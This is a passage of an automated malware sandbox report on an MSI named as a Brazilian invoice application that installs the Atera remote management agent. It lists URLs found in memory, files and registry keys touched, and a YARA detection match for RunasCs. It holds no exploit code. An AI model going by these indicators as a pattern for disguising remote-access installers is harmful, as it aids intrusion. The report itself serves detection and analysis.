                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1984126068.000002156C344000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2125952751.000001F735E52000.00000002.00000001.01000000.00000025.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll1.13.drString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Roemer/chocolatey-packages
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/jdk11u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/jdk17/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/jdk21/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/jdk8u/blob/master/LICENSE
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.24%2B8/OpenJDK11U-jre_x86-
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin11-binaries/releases/download/jdk-11.0.25%2B9/OpenJDK11U-jre_x64_
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.12%2B7/OpenJDK17U-jre_x86-
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.13%2B11/OpenJDK17U-jre_x64
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin21-binaries/releases/download/jdk-21.0.5%2B11/OpenJDK21U-jre_x64_
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin8-binaries/releases/download/jdk8u422-b05/OpenJDK8U-jre_x86-32_wi
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/adoptium/temurin8-binaries/releases/download/jdk8u432-b06/OpenJDK8U-jre_x64_windo
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.12/AgentPackageSystemTools.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.12/AgentPackageSystemTools.zip?0Y
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/30.3/AgentPackageTicketing.zip
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/30.3/AgentPackageTicketing.zip?0YJRFk/
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216305AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageUpgradeAgent/27.6/AgentPackageUpgradeAgent.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Availability/13.0/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.IotPoc/13.0/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427A7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.Watchdog/13.0/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4284E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageAgentInformation/22.7/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageMonitoring/22.0/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstaller
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B8A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageTaskScheduler/13.1/AgentPackageTaskScheduler.zip
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://ps.atera.com/installers/Agents/Mac/
                                Source: AgentPackageUpgradeAgent.exe, 0000002A.00000000.2335964500.0000022039CD2000.00000002.00000001.01000000.00000027.sdmpString found in binary or memory: https://ps.atera.com/installers/Agents/Windows/
                                Source: AgentPackageTicketing.exe, 0000002C.00000002.3063046700.000002140007F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkgX
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00111000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000000.2019302027.000002EF73BC2000.00000002.00000001.01000000.0000001A.sdmpString found in binary or memory: https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exe
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42D29000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B4C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42D29000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.000002163055F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B4C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=17da5852-f989-44bc-b44d-76379b8f82c1
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=1a7f0a96-6cc5-4ebb-9ff5-3167722267eb
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2252d76e-40dc-4fde-8a4e-93e2cb6baeac
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9b97c88b-00f9-4ad4-acca-b3179ff49e5e
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42866000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=ae41f17c-0e47-4ac8-b86c-d99af8cebe36
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.000002163055F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b0a02166-da11-4e5e-9bd0-e30e8bdfd576
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b1032fc2-4256-41bd-80b8-b976c513c924
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b3da8718-647d-4170-800b-e0be5a02ff6d
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/52187e48
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscrib
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C4291B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B4C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/52187e48-563c-468d-9785
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C427F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.pndsn.comrent
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.github.com/sebnilsson/ChocolateyPackages/master/SmartGit/logo.png
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/JetBrains/Chocolatey/master/TeamCityAddin/logo.png
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/asciidoctor/asciidoctorj/main/LICENSE.txt
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/johanjanssen/AdoptOpenJDKChocolateyPackages/master/AdoptOpenJDK/Ad
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rawcdn.githack.com/ajshastri/chocolatey-packages/a698d21b3c63b9ff7e01f442f37cdb7ecf89925a/ic
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rawcdn.githack.com/johanjanssen/AdoptOpenJDKChocolateyPackages/301e926794e98de48f9c9f3a32b18
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://repo1.maven.org/maven2/org/flywaydb/flyway-commandline/10.21.0/flyway-commandline-10.21.0-wi
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.maven.org/remotecontent?filepath=org/asciidoctor/asciidoctorj/2.5.13/asciidoctorj-2.5
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2128484698.000001F735F12000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://system.data.sqlite.org/
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2129883907.000001F735F74000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://system.data.sqlite.org/X
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://teamcity-support.jetbrains.com/hc/en-us/community/topics
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2128484698.000001F735F12000.00000002.00000001.01000000.00000026.sdmpString found in binary or memory: https://urn.to/r/sds_see
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://wiki.openjdk.java.net/display/JDKUpdates/JDK11u
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: https://www.digicert.com/CPS0
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jetbrains.com/help/teamcity/2024.12/teamcity-2024-12-release-notes.html
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jetbrains.com/teamcity/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jetbrains.com/teamcity/buy/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jetbrains.com/teamcity/buy/IsLa
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.jetbrains.com/teamcity/documentation/
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                                Source: AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll1.13.drString found in binary or memory: https://www.newtonsoft.com/jsonschema
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2125875531.000001F735E48000.00000002.00000001.01000000.00000024.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2123394942.000001F735D72000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: https://www.nuget.org/packages/NLog.Web.AspNetCore
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.1984126068.000002156C344000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2125952751.000001F735E52000.00000002.00000001.01000000.00000025.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2463044015.0000022B9B020000.00000002.00000001.01000000.00000038.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, Newtonsoft.Json.dll1.13.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.oracle.com/technetwork/java/javase/8all-relnotes-2226344.html
                                Source: AgentPackageMonitoring.exeString found in binary or memory: https://www.sqlite.org/copyright.html
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2168030863.00007FFDEE584000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://www.sqlite.org/copyright.html2
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtrack.jetbrains.com/issues/TW
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                Spam, unwanted Advertisements and Ransom Demands

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AlphaAgent

                                System Summary

                                Source: 35.2.AgentPackageMonitoring.exe.1f71cd60000.1.unpack, type: UNPACKEDPE Matched rule: yara_runascs Author: Sekoia.io
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\692c41.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2D79.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2FBD.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3FBB.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI41D0.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI41D1.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI422F.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI432A.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\692c43.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI56F2.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\692c44.msi
